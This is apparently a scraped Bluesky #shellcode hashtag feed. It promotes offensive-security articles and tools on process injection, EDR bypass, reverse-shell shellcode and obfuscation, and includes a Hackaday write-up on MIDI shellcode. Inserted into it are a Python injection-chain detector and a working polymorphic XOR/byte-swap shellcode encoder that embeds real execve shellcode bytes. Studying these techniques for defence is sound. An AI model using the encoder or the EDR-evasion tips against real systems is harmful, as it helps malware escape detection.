#shellcode

Latest posts tagged with #shellcode on Bluesky

Posts tagged #shellcode

EarlyBird APC Injection: A Deep Technical Analysis The EarlyBird APC technique creates a trusted process in a suspended state, allocates memory for shellcode, and writes the payload. It then queues the shellcode as an Asynchronous Procedure Call (APC) to the suspended thread. Resuming the thread forces immediate, stealthy execution of the malicious code.

Original text by Malforge Group


This article provides a detailed examination of the EarlyBird APC Injection technique, a sophisticated method for executing arbitrary code within the context of a trusted process. #APC #bypass #EDR #injection #QueueUserAPC #shellcode #windows
core-jmp.org/?p=242

Abusing Microsoft Warbird for Shellcode Execution The article demonstrates an EDR bypass by using an undocumented Warbird interface to stealthily load shellcode.

Original text by cirosec.de


TL;DR


In this blog post, we’ll be covering Microsoft Warbird and how we can abuse it to sneakily load shellcode without being detected by AV or EDR solutions. #bypass #EDR #microsoft #shellcode #Warbird #windows
core-jmp.org/?p=221

Mastering Living off the Process in Offensive Security No need for overusing WriteProcessMemory, VirtualAlloc, injecting a DLL, etc. This way, everything you need to manipulate the remote process is self-contained and already available to the process.

Original text by R.B.C (g3tsyst3m)


Hello again everyone! Hope the start to the new year is treating you well. I am excited to share a new blog post with you! #asm #cpp #debug #gadgets #ROP #shellcode #windows
core-jmp.org/?p=159

MultiSearch Tag Explorer MultiSearch Tag Explorer - Explore tags and search results by aéPiot

#SHELLCODE
allgraph.ro/advanced-sea...
#ALESHIGN #BAWEKE
allgraph.ro/advanced-sea...
#BELARUSIAN #PARTISAN #MOVEMENT 2020 #PRESENT
multi-search-tag-explorer.aepiot.ro/advanced-sea...
aepiot.ro

PIC shellcode: The Rust Way Originally published at Cyberpath A Hands-On Analysis of the Rustic64 Project In...

PIC shellcode: The Rust Way Originally published at Cyberpath A Hands-On Analysis of the Rustic64 Project In cybersecurity and malware development the use of Position Independent Code (PIC) has gai...

#shellcode #rust #offensivesecurity #redteam

Android Hacking for Beginners | Ethical Hacking Full Course (Step-by-Step) | mobile hacking course Learn Android Ethical Hacking from Scratch! This course is designed for beginners who want to understand Android hacking. Watch at 1.5x speed 🔹 [00:00] - Introduction to Android Ethical Hacking 🔹 [01...

Android Hacking for Beginners | Ethical Hacking Full Course (Step-by-Step) | mobile hacking course twuai.com/search/8z7wG...
#msfvenom #metasploit #maldev #exploiting #android #malware #hacking101 #shellcode #binwalk


A Mega Malware Analysis Tutorial Featuring Donut-Generated Shellcode A beginner-friendly tutorial on analyzing .NET malware teaches you how to use common tools, recognize techniques and understand ...

#Learning #Hub #Malware #.NET #IDA #Pro […]

[Original post on unit42.paloaltonetworks.com]


Hiding shellcode in applications In this article we will look at...

habr.com/ru/companies/otus/articl...

#reverse-engineering #exploit #shellcode #payload #windows #internals #reverse #engineering

Publications | FortiGuard Labs A full malware analysis is quite long to perform. Depending on its complexity and the desired level of details, it takes between half a day and 10 ...

Slides of my presentation at @northsec.io are available here www.fortiguard.com/events/6101/...

Worked on 2 different malware samples and showed how well the AI performed overall in decompiling or de-obfuscating them, but also some errors it made in the details.

#r2ai #ladvix #shellcode #linux #IoT

GitHub - psycore8/shencode: A versatile tool for working with shellcodes A versatile tool for working with shellcodes. Contribute to psycore8/shencode development by creating an account on GitHub.

I'm proud to announce the release of ShenCode 0.8.2. It introduces a polymorphic WinExec shellcode creator with customizable commands.
I plan to write more technical tutorials about some of its features. Until then, check out github.com/psycore8/she...

#Shellcode #GitHub #MalwareDev #RedTeam

GitHub - psycore8/shencode: A versatile tool for working with shellcodes A versatile tool for working with shellcodes. Contribute to psycore8/shencode development by creating an account on GitHub.

After several weeks of fighting the Windows API, ShenCode 0.8.0 is out now. There are 3 new injection modules:

- DLL-Injection
- NtInjection
- Process_Overwriting

If you like it, please leave me a star:

github.com/psycore8/she...

#Shellcode #GitHub #MalwareDev #RedTeam

Injecting shellcode?

Avoid VirtualAlloc/WriteProcessMemory detection.

Use NtMapViewOfSection with a shared memory section between processes.

It bypasses common EDR hooks.

Subtle persistence wins.

#RedTeam #Malware #Infosec #Cybersecurity #EDR #Shellcode

Injecting shellcode?

Avoid VirtualAlloc/WriteProcessMemory detection.

Use NtMapViewOfSection with a shared memory section between processes.

It bypasses common EDR hooks.

Subtle persistence wins.

#RedTeam #Malware #Infosec #Potatosecurity #EDR #Shellcode

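The EarlyBird APC post at the top of this feed and the two NtMapViewOfSection posts just above describe two ways of getting shellcode into another process: write it with VirtualAllocEx/WriteProcessMemory into a suspended child and queue an APC before the first thread runs, or create a section, map it locally, fill the local view, and map the same section into the target so no cross-process write API is ever called. Hooks that only watch VirtualAllocEx/WriteProcessMemory do miss the second variant, which is the post's point; a detector keyed on the call sequence and on the cross-process mapping sees both. What follows is an added example, not code from any of these posts: a small sequence detector over a constructed API trace that recognises both chains and stays silent on a debugger-style CREATE_SUSPENDED launch that never writes into the child. The event schema, field names and pids are assumptions for this demo, and thread handles are assumed to have already been resolved to the owning process id.

```python
"""Sequence detection of remote shellcode injection chains (added example).

The traces below are a constructed imitation of a user-mode API trace such as
an EDR sensor or API monitor would emit. Field names, pids and the exact set
of API names are assumptions for this demonstration, not a product schema.
"""
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004  # documented dwCreationFlags bit

WRITE_APIS = {"WriteProcessMemory", "NtWriteVirtualMemory"}
APC_APIS = {"QueueUserAPC", "NtQueueApcThread"}
THREAD_APIS = {"CreateRemoteThread", "NtCreateThreadEx", "SetThreadContext"}


def _new_state():
    return {"suspended": False, "written": False, "section": False,
            "mapped_local": False, "mapped_remote": False,
            "apc": False, "thread": False, "reported": set()}


def detect_injection_chains(events):
    """Return [(source_pid, target_pid, technique), ...] in detection order.

    Each event is a dict: pid (caller), api (name), target_pid (process the
    call acts on, None for the caller itself) and, for CreateProcess*, flags
    (dwCreationFlags). Order matters: a step only counts when it appears
    after the steps the technique needs before it.
    """
    state = defaultdict(_new_state)   # keyed by (source_pid, target_pid)
    findings = []

    def report(src, dst, technique):
        s = state[(src, dst)]
        if technique not in s["reported"]:
            s["reported"].add(technique)
            findings.append((src, dst, technique))

    for ev in events:
        src, api, dst = ev["pid"], ev["api"], ev.get("target_pid")
        me = state[(src, src)]        # caller-local facts: section created, mapped locally

        if api.startswith("CreateProcess") and dst is not None:
            if ev.get("flags", 0) & CREATE_SUSPENDED:
                state[(src, dst)]["suspended"] = True
        elif api == "NtCreateSection":
            me["section"] = True
        elif api == "NtMapViewOfSection":
            if dst in (None, src):
                me["mapped_local"] = me["section"]          # view of our own section
            elif me["section"] and me["mapped_local"]:
                state[(src, dst)]["mapped_remote"] = True   # same bytes now visible in dst
        elif dst not in (None, src):
            s = state[(src, dst)]
            placed = s["written"] or s["mapped_remote"]     # code already in the target?
            if api in WRITE_APIS:
                s["written"] = True
            elif api in APC_APIS:
                s["apc"] = placed                           # an APC before any write is not the chain
                if s["mapped_remote"]:
                    report(src, dst, "section_mapping_injection")
            elif api in THREAD_APIS and placed:
                s["thread"] = True
                if s["mapped_remote"]:
                    report(src, dst, "section_mapping_injection")
                else:
                    report(src, dst, "remote_thread_injection")
            elif api == "ResumeThread":
                if s["suspended"] and s["apc"]:
                    report(src, dst, "earlybird_apc")
    return findings


# Constructed trace 1: the EarlyBird chain (CREATE_SUSPENDED, write, APC, resume).
EARLYBIRD_TRACE = [
    {"pid": 4242, "api": "CreateProcessW", "target_pid": 5100, "flags": CREATE_SUSPENDED},
    {"pid": 4242, "api": "VirtualAllocEx", "target_pid": 5100},
    {"pid": 4242, "api": "WriteProcessMemory", "target_pid": 5100},
    {"pid": 4242, "api": "QueueUserAPC", "target_pid": 5100},
    {"pid": 4242, "api": "ResumeThread", "target_pid": 5100},
]

# Constructed trace 2: section mapping in place of VirtualAllocEx/WriteProcessMemory.
SECTION_TRACE = [
    {"pid": 4242, "api": "NtCreateSection"},
    {"pid": 4242, "api": "NtMapViewOfSection"},                       # local view, payload written here
    {"pid": 4242, "api": "NtMapViewOfSection", "target_pid": 6200},   # same section mapped into target
    {"pid": 4242, "api": "NtCreateThreadEx", "target_pid": 6200},
]

# Constructed trace 3: debugger-style launch. CREATE_SUSPENDED plus ResumeThread
# with no write into the child is legitimate and must not fire.
BENIGN_TRACE = [
    {"pid": 900, "api": "CreateProcessW", "target_pid": 901, "flags": CREATE_SUSPENDED},
    {"pid": 900, "api": "ReadProcessMemory", "target_pid": 901},
    {"pid": 900, "api": "ResumeThread", "target_pid": 901},
]

if __name__ == "__main__":
    for name, trace in (("earlybird", EARLYBIRD_TRACE), ("section", SECTION_TRACE), ("benign", BENIGN_TRACE)):
        print(name, detect_injection_chains(trace))
```

The detector keys state on the (caller, target) pair rather than on any single API, which is why swapping WriteProcessMemory for a shared section changes only which flag gets set, not whether the chain is recognised. Real traces also need handle-to-pid resolution and a time window per pair, both left out here.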
Shellcode Over MIDI? Bad Apple On A PSR-E433, Kinda If hacking on consumer hardware is about figuring out what it can do, and pushing it in directions that the manufacturer never dared to dream, then this is a very fine hack indeed. [Portasynthinca3] takes on the Yamaha PSR-E433, a cheap beginner keyboard, discovers a shell baked into it, and takes it from there.

[Portasynthinca3] reverse engineered the firmware, wrote shellcode for the device, embedded the escape in a MIDI note stream, and even ended up writing some simple LCD driver software with a totally decent refresh rate on the dot-matrix display (https://psi3.ru/blog/swl01u/), all to support the lofty goal of displaying arbitrary graphics on the keyboard’s dot-matrix character display.

Now, we want you to be prepared for a low-res video extravaganza here. You might have to squint a bit to make out what’s going on in the video, but keep in mind that it’s being sent over a music data protocol from the 1980s, running at 31.25 kbps, displayed in the custom character RAM of an LCD.

As always, the hack starts with research. Identifying the microcontroller CPU led to JTAG and OpenOCD. (We love the technique of looking at the draw on a bench power meter to determine if the chip is responding to pause commands.) Dumping the code and tossing it into Ghidra led to the unexpected discovery that Yamaha had put a live shell in the device that communicates over MIDI, presumably for testing and development purposes. This shell had PEEK and POKE, which meant that OpenOCD could go sit back on the shelf. Poking “Hello World” into some free RAM space over MIDI sysex (https://cmtext.indiana.edu/MIDI/chapter3_system_messages.php) was the first proof-of-concept.

The final hack to get video up and running was to dig deep into the custom character-generation RAM, write some code to disable the normal character display, and then fool the CPU into calling this code instead of the shell, in order to increase the update rate. All of this for a thin slice of Bad Apple over MIDI, but more importantly, for the glory. And this hack is glorious! Go check it out in full.

MIDI is entirely hacker friendly, and it’s likely you can hack together a musical controller that would wow your audience just with stuff in your junk box. If you’re at all into music, and you’ve never built your own MIDI devices, you have your weekend project (https://hackaday.com/2024/10/20/a-parts-bin-midi-controller-in-24-hours/).

Video: Yamaha PSR-E433 Bad Apple demo (YouTube, u6sukVMijBg).

Thanks [James] for the gonzo tip!

Shellcode over MIDI? Bad Apple on a PSR-E433, Kinda If hacking on consumer hardware is about figu...

hackaday.com/2025/01/23/shellcode-ove...

#Musical #Hacks #Reverse #Engineering #bad #apple #midi #reverse #engineering #shellcode #video

Guide to Creating Linux Reverse Shell Shellcode The article provides a detailed five-step guide for creating reverse shell shellcode in Linux, including code snippets and suggestions for enhancements.

Learn to create reverse shell shellcode in Linux with this comprehensive five-step guide. It includes code snippets and enhancement tips for better functionality. Boost your #cybersecurity skills and understand the mechanics of #threat models. #Linux #shellcode #infosec

World's First MIDI Shellcode Blog post about a reverse engineering project

World's First MIDI Shellcode | #security #MIDI #shellcode #exploit | psi3.ru/blog/swl01u/

Nullcon Security Conference & Training Nullcon is Asia’s largest international security conference, where key stakeholders from the industry, delegates from the government, company representatives, COOs and hackers come together to talk abo...

🛠️ Malware that sleeps, works, and never stays! 😴

Learn how Kong Loader uses sleep masks to make malware invisible in memory throughout its execution, offering a new level of stealth and evasion

Join @tijme.bsky.social at #NullconGoa2025

👉 nullcon.net/goa-2025/spe...

#kongloader #shellcode

Creating Windows Shellcode - YouTube This video series will walk you through how to create Windows shellcode! We'll use nasm for our assembler and sclauncher for testing. We'll discuss how to us...

🔥 Ready to learn how to create #windows #shellcode? This member's-only series on #YouTube will walk you through the basics. You'll find series resources 👇

www.thecyberyeti.com/training#win...

And the playlist 👇

youtube.com/playlist?lis...


Omg hacking with shellcode was so damn fun, bravo. Day 8 of #AdventOfCyber done. #tryhackme #shellcode #msfvenom #hacktheplanet

GitHub - psycore8/shencode: A multi purpose tool for shellcode operations A multi purpose tool for shellcode operations. Contribute to psycore8/shencode development by creating an account on GitHub.

I’m excited to introduce Shencode 0.6.0! In this version, I’ve fixed numerous bugs, improved the OOP implementation, and added the new ByteSwap module (see my previous post). Please leave a star if you like the tool!

github.com/psycore8/she...

#Shellcode #GitHub #MalwareDev #RedTeam

TrueCyber TrueCyber

We are going live tonight at 5 PM EST.

Tonight's session will demonstrate how to execute shellcode within a C# process without modifying memory permissions and avoiding EDR detection.

More information below.

www.linkedin.com/posts/charle...

truecyber.world

#pentest #redteam #shellcode

Obfuscation: ByteSwapping [NoSociety.de]

ByteSwapper: my polymorphic shellcode with in-memory decoder, and a detailed explanation of its functionality:

www.nosociety.de/en:it-securi...

#ShellCode #Malware-Dev #blog

GitHub - psycore8/shencode: A multi purpose tool for shellcode operations A multi purpose tool for shellcode operations. Contribute to psycore8/shencode development by creating an account on GitHub.

I've added a new module, to encrypt shellcode with AES. ShenCode 0.5.1 - Shellcode operations with love!
github.com/psycore8/she...

#shellcode #github #pentest

GitHub - psycore8/shencode: automation script for creating and obfuscating metasploit shellcode automation script for creating and obfuscating metasploit shellcode - psycore8/shencode

ShenCode 0.5.0 - a multi purpose tool for shellcode development github.com/psycore8/she...
#shellcode #github #pentest

Obfuscation: polymorphic in-memory decoder [NoSociety.de]

Develop polymorphic shellcode: www.nosociety.de/en:it-securi...
#itsecurity #shellcode

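The two NoSociety.de posts in this feed (the ByteSwapping obfuscation post and the polymorphic in-memory decoder post) and the ShenCode ByteSwap module all rest on the same property: the payload is stored transformed, a decoder restores it in memory right before execution, and a fresh key per build makes every encoded copy look different. What follows is an added example of that idea in Python, my own construction for this page; it is not the ByteSwapper code and makes no claim about how that decoder or ShenCode actually work. The pair-swap-then-XOR scheme, the key length and the bad-character handling are choices made here. The sample payload is the widely published 23-byte x86-64 execve("/bin/sh") shellcode, used purely as input bytes; nothing in the example executes it.

```python
"""Polymorphic byte-swap encoder with matching decoder (added example).

Scheme (an assumption for this demo, not NoSociety.de's or ShenCode's):
  1. for each 2-byte pair, swap the two bytes if the key byte for that pair is odd;
  2. XOR every byte with the key byte for its position.
The decoder applies the inverse in reverse order. A random key per build gives a
different encoded blob each time; the decoder and key embedded with it must also
survive the same bad-character constraints as the payload.
"""
import os

KEY_LEN = 16

# Widely published textbook x86-64 execve("/bin/sh") shellcode, used only as sample
# input bytes: xor rsi,rsi; push rsi; mov rdi,"/bin//sh"; push rdi; push rsp; pop rdi;
# push 0x3b; pop rax; cdq; syscall.
SAMPLE_PAYLOAD = bytes.fromhex("4831f65648bf2f62696e2f2f736857545f6a3b58990f05")


def encode(payload: bytes, key: bytes) -> bytes:
    """Swap pairs selected by odd key bytes, then XOR with the repeating key.
    A trailing odd byte is only XORed."""
    out = bytearray(payload)
    n = len(out)
    for i in range(0, n - 1, 2):
        if key[(i // 2) % len(key)] & 1:
            out[i], out[i + 1] = out[i + 1], out[i]
    for i in range(n):
        out[i] ^= key[i % len(key)]
    return bytes(out)


def decode(blob: bytes, key: bytes) -> bytes:
    """Inverse of encode: undo the XOR, then undo the swaps. This is the work an
    in-memory decoder stub does before transferring control to the payload."""
    out = bytearray(blob)
    n = len(out)
    for i in range(n):
        out[i] ^= key[i % len(key)]
    for i in range(0, n - 1, 2):
        if key[(i // 2) % len(key)] & 1:
            out[i], out[i + 1] = out[i + 1], out[i]
    return bytes(out)


def encode_avoiding(payload: bytes, bad: bytes = b"\x00", max_tries: int = 1000):
    """Draw a fresh random key per build until neither the key nor the encoded
    blob contains a bad character (the classic null-byte constraint of payloads
    that travel through string-copying code). Returns (key, blob)."""
    for _ in range(max_tries):
        key = os.urandom(KEY_LEN)
        if any(b in key for b in bad):
            continue  # the key ships inside the decoder stub, so it is constrained too
        blob = encode(payload, key)
        if not any(b in blob for b in bad):
            return key, blob
    raise RuntimeError("no suitable key found; widen the key or relax the bad-char set")


if __name__ == "__main__":
    key, blob = encode_avoiding(SAMPLE_PAYLOAD)
    print("key :", key.hex())
    print("blob:", blob.hex())
    print("round trip ok:", decode(blob, key) == SAMPLE_PAYLOAD)
```

Running the block twice prints two different blobs for the same payload, which is the whole point of the per-build key: a signature written against one encoded sample does not match the next, while the decoder logic itself is unchanged and is what a static detection has to target instead.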
GitHub - psycore8/shencode: automation script for creating and obfuscating metasploit shellcode automation script for creating and obfuscating metasploit shellcode - psycore8/shencode

ShenCode 0.4.0 out now!
#shellcode
github.com/psycore8/she...
